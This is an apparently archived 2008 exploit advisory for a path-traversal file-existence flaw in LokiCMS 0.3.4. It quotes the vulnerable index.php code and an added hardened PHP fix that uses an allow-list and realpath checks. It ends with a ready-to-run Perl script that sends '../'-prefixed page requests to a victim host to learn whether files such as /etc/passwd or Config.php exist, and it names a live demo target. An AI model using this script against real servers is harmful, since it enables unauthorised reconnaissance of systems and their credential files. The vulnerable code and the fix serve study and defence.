LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
Source: http://spanish-hackers.com Author: JosS Published: 2008-10-20

# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
# url: http://www.lokicms.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

vulnerability:
The vulnerability allows a remote user to verify the existence of files and directories on the server,
because the "page" parameter reaches file_exists() without any path filtering.
/etc/passwd (example)

vuln file: index.php
vuln code:
------------------------------------------------
if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) );

// load the page
if ($pagename == '') {
 $name = $c_default;
 $nosimple = true;
} else {
 $name = $pagename;
};

if ($c_simplelink == true && $nosimple != true) {
 $content = findpage($name);
 if ($content == "") {$content = $c_default;};
} else {
 $content = $name;
};

// stupid fix due to subdomain problems
if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . $content) == false) {$content = $c_default;};};

// load the menu
$menu = getmenu($content, $c_modrewrite, $c_simplelink);

$content = parsepage($content);
------------------------------------------------
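
A hardened form of the page lookup above, as an added example that is not LokiCMS code and not part of the original advisory. The helper name resolve_page(), the allowed page-name pattern and the throwaway demo directory are assumptions; every rejected or missing name returns the same default page, so the response no longer differs by whether a path outside pages/ exists.

```php
<?php
// Added example, not LokiCMS code: resolve_page() is a hypothetical helper.
declare(strict_types=1);

/**
 * Map a user-supplied page name to a file inside $pagesDir.
 * Every rejected or missing name yields $default, so the response
 * does not reveal whether a path outside pages/ exists.
 */
function resolve_page(string $pagesDir, string $requested, string $default): string
{
    $base = realpath($pagesDir);
    if ($base === false) {
        throw new RuntimeException('pages directory not found');
    }
    $name = trim($requested);
    // Allow-list (assumed naming scheme): one file name, no separators,
    // no dot-segments, no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)?\z/', $name)) {
        return $default;
    }
    // Defence in depth: after symlink resolution the target must be a
    // regular file directly below the pages directory.
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($resolved === false || dirname($resolved) !== $base || !is_file($resolved)) {
        return $default;
    }
    return $name;
}

// Constructed demo: a temporary pages/ directory with one page and a sibling file.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'loki_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/home', 'welcome');
file_put_contents($root . '/secret.php', 'constructed sample file');

// An existing file outside pages/ and a missing one both map to the default page.
foreach (['home', '../secret.php', '../missing.php', '..', "home\0.php", ''] as $input) {
    printf("%-18s => %s\n", json_encode($input), resolve_page($root . '/pages', $input, 'home'));
}
```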

use strict;
use LWP::UserAgent;

sub lw
{
    my $SO = $^O;
    my $linux = "";
    if (index(lc($SO), "win") != -1) {
        $linux = "0";
    } else {
        $linux = "1";
    }
    if ($linux) {
        system("clear");
    } else {
        system("cls");
    }
}

&lw;

print "#################################################################\n";
print "#  LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit  #\n";
print "#################################################################\n";

my $victim = $ARGV[0];
my $file = $ARGV[1];

 # Both arguments are required; print the usage text if either is missing.
 if((!$ARGV[0]) || (!$ARGV[1])) {
    print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl xpl.pl [host] [file]\n";
    print "[x] example: http://localhost/loki/ /includes/Config.php\n\n";
    exit(1);
 }
 
    print "\n[+] connecting: $victim\n";
    my $cnx = LWP::UserAgent->new() or die;
    my $go=$cnx->get($victim."index.php?page=../$file");
    if ($go->content =~ m/LokiCMS/ms) {
        print "[-] The file not exist\n\n";
    } else {
        print "[!] The file exist: $file\n\n";
    }

# live demo: http://demo.opensourcecms.com/lokicms/


 